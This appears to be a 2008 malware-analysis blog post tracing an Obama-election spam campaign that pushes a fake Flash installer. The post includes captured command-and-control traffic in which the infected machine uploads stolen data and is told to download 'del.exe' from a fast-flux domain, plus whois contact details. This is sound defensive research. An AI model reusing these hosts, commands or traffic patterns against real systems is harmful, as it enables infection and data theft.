Yesterday, the 5th of November, we started receiving spam that advertised Obama Election videos. These emails are rather plain and only contain simple text and a link.

Email Contents:

Barack Obama Elected 44th President of United States
Barack Obama, unknown to most Americans just four years ago, will become the 44th president and
the first African-American president of the United States.
Watch His amazing speech at November 5!

A link to http://{removed}">Proceed to the election results news page

2008 American Government Official Website

This site delivers information about current U.S. Foreign policy and about American life and culture.

The URL domains are randomly generated and hosted from slaves with in the Bot network. As of today these URLs do resolve or host blank pages. We also noted that the 2 domains were registered on November 4th and originated in China, a before we started receiving the spam messages.

verifyonenet.exacttrget.sessionervlet.1otmvxgjb.securitychallenge.communitypage.rn1mnqinq.bfiinwach.com
 - Domain no longer resolvable

carehtmlclient.viewcontent.productsremote.3xnhnoe9x.customerlogin.verification.wqvnskxwk.gerimumsoe.com
 - Domain no longer resolvable

When the user visits the site, it will prompt the user to download and install adobe_flash9.exe every 11 second. This download prompt is accomplished through the use of the Refresh Meta tag. It is not a JavaScript.

Once the download is complete, Windows prompts the user to run the executable. When the executable is run it deletes the adobe_flash6.exe and creates a running process named 9129837.exe based in C:\Windows. The name of this new program is constant across all the different test machines we ran it on as well as on the live machines of people who executed it.

In our case the 9129837.exe tried to injected code into the running user process Explorer.exe. This is standard behavior so the malware becomes invisible in the task manager. On XP the Security Center was disable, firewall turned off and the we were unable to bring up the task manager. The 9129837.exe also connected to what appears to be a command and control site for instructions and to upload key information. One of the first instructions was to down load part of a root kit del.exe from a separate domain.

Here are the http communications between the infect machine and C&C. On each host the order of requests was not the same, only the request to the pstore.cgi was 1st.

Server: 91.203.93.57

Query the RIPE Database
Search for
Switch to the RIPE TEST Database

% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag

% Information related to '91.203.93.1 - 91.203.93.128'

inetnum:         91.203.93.1 - 91.203.93.128
netname:         ZHITOMIR-NET
descr:           pool for co-location customers
country:         UA
admin-c:         ML7676-RIPE
tech-c:          ML7676-RIPE
status:          ASSIGNED PI "status:" definitions
mnt-by:          UATELECOM-MNT
source:          RIPE # Filtered

person:          Mark Liberman
address:         Kiev, Ukraine
e-mail:          m.liberman@uatelecom.com.ua
phone:           +380963801326
nic-hdl:         ML7676-RIPE
source:          RIPE # Filtered

% Information related to '91.203.92.0/22AS44997'

route:           91.203.92.0/22
descr:           BTG-AS
origin:          AS44997
mnt-by:          UATELECOM-MNT
remarks:         responsible: abuse@uatelecom.com.ua
source:          RIPE # Filtered

Request and Response 1

POST /cgi-bin/pstore.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------13c89313c89313c893
User-Agent: IE
Host: 91.203.93.57
Content-Length: 229
Cache-Control: no-cache

----------------------------13c89313c89313c893
Content-Disposition: form-data; name="upload_file"; filename="160856006.5"
Content-Type: application/octet-stream

Forms: 

----------------------------13c89313c89313c893--
HTTP/1.1 200 OK
Connection: close
Content-type: text/html
Content-Length: 3
Date: Wed, 05 Nov 2008 18:38:31 GMT
Server: lighttpd/1.4.20

ok!

Request and response 2

GET /cgi-bin/options.cgi?user_id=160856006&version_id=5&p... HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.203.93.57
Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-type: octet/stream
Content-Length: 14
Date: Wed, 05 Nov 2008 18:38:32 GMT

Server: lighttpd/1.4.20

(...........e0

Request and Response 3

GET /cgi-bin/cmd.cgi?user_id=160856006&version_id=5&p... HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.203.93.57
Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
Last-Modified: Wed, 5 Nov 2008 18:38:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-type: text/plain
Content-Length: 35
Date: Wed, 05 Nov 2008 18:38:31 GMT
Server: lighttpd/1.4.20

DL_EXE=http://solecokes.com/del.exe

Request and Response 4

POST /cgi-bin/cert.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------13cc7b13cc7b13cc7b
User-Agent: IE
Host: 91.203.93.57
Content-Length: 303
Cache-Control: no-cache

----------------------------13cc7b13cc7b13cc7b
Content-Disposition: form-data; name="upload_file"; filename="160856006.5"
Content-Type: application/octet-stream

0S...0...*.H..
.......0.0;0.0...+........5......&u8.I.>../z...w..=C..C.>l."..`p......
----------------------------13cc7b13cc7b13cc7b--
HTTP/1.1 200 OK
Connection: close
Content-type: text/html
Content-Length: 3
Date: Wed, 05 Nov 2008 18:38:32 GMT
Server: lighttpd/1.4.20

ok!

The target machine now contacts solecokes.com as directed to download part of the rootkit as defined by the DL_EXE reponse

GET /del.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: solecokes.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Wed, 05 Nov 2008 18:38:25 GMT
Server: Apache
Last-Modified: Mon, 03 Nov 2008 21:06:19 GMT
ETag: "400099-6000-518148c0"
Accept-Ranges: bytes
Content-Length: 24576
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

{Binary data remote}

As of this morning at 06:00 the solecokes.com resolves to several different IP address:

Non-authoritative answer:
Name:	solecokes.com
Address: 190.95.28.108
Name:	solecokes.com
Address: 221.213.78.6
Name:	solecokes.com
Address: 81.247.61.210
Name:	solecokes.com
Address: 82.83.199.100
Name:	solecokes.com
Address: 121.113.166.191

Yesterday, 11/5, at 12:42 the same domain resolved to:

Non-authoritative answer:
Name:	solecokes.com
Address: 89.102.187.216
Name:	solecokes.com
Address: 90.183.68.7
Name:	solecokes.com
Address: 81.242.197.189
Name:	solecokes.com
Address: 87.207.9.23

It is pretty obvious that the solecokes.com domain is part of a dynamic DNS scheme. I would not doubt that these IP resolve to bot hosts.

A DNS lookup on 87.207.9.23 reveals:

Non-authoritative answer:
23.9.207.87.in-addr.arpa	name = chello087207009023.chello.pl.

and DNS lookup on 81.242.197.189 pretty much seals the deal that these are just bots hosting temporary malware sites.

Non-authoritative answer:
189.197.242.81.in-addr.arpa	name = 189.197-242-81.adsl-dyn.isp.belgacom.be.

A little digging around the root of this site displays a Wachovia error page. As it turns out this site was used as a malicious site to trick Wachovia users during the buy out by Wells Fargo. The bot network admins realized the opportunity present with the election of Mr. Obama and quickly retooled the site to accommodate that. This highlights how fast the malware sites and bot net admins can quickly change gears to make use of opportunities as they present them selves.